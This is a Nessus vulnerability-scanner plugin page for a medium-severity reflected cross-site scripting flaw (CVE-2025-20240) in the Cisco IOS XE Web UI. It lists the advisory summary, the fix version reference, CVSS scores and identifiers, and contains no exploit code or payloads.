Detections
Analytics

Cisco IOS XE Software Web UI Reflected XSS (cisco-sa-webui-xss-VWyDgjOU)

medium Nessus Plugin ID 272739

Language:

Synopsis

A vulnerability in the Web Authentication feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting attack (XSS) on an affected device.

Description

According to its self-reported version, Cisco IOS-XE Software is affected by a vulnerability.
An attacker could exploit this vulnerability by persuading a user to click a malicious link. A successful exploit could allow the attacker to execute a reflected XSS attack and steal user cookies from the affected device.

Please see the included Cisco BIDs and Cisco Security Advisory for more information.

Solution

Upgrade to the relevant fixed version referenced in Cisco bug ID CSCwm57073

See Also

http://www.nessus.org/u?482d14dd

http://www.nessus.org/u?acad5d9e

https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwm57073

Plugin Details

Severity: Medium

ID: 272739

File Name: cisco-sa-webui-xss-VWyDgjOU-iosxe.nasl

Version: 1.1

Type: combined

Family: CISCO

Published: 11/5/2025

Updated: 11/5/2025

Supported Sensors: Nessus

Risk Information

VPR

Risk Factor: Low

Score: 3.8

CVSS v2

Risk Factor: Medium

Base Score: 6.4

Temporal Score: 4.7

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N

CVSS Score Source: CVE-2025-20240

CVSS v3

Risk Factor: Medium

Base Score: 6.1

Temporal Score: 5.3

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Temporal Vector: CVSS:3.0/E:U/RL:O/RC:C

Vulnerability Information

CPE: cpe:/o:cisco:ios_xe

Required KB Items: Host/Cisco/IOS-XE/Version

Exploit Ease: No known exploits are available

Patch Publication Date: 9/24/2025

Vulnerability Publication Date: 9/24/2025

Reference Information

CVE: CVE-2025-20240

CWE: 692

CISCO-SA: cisco-sa-webui-xss-VWyDgjOU

IAVA: 2025-A-0701

CISCO-BUG-ID: CSCwm57073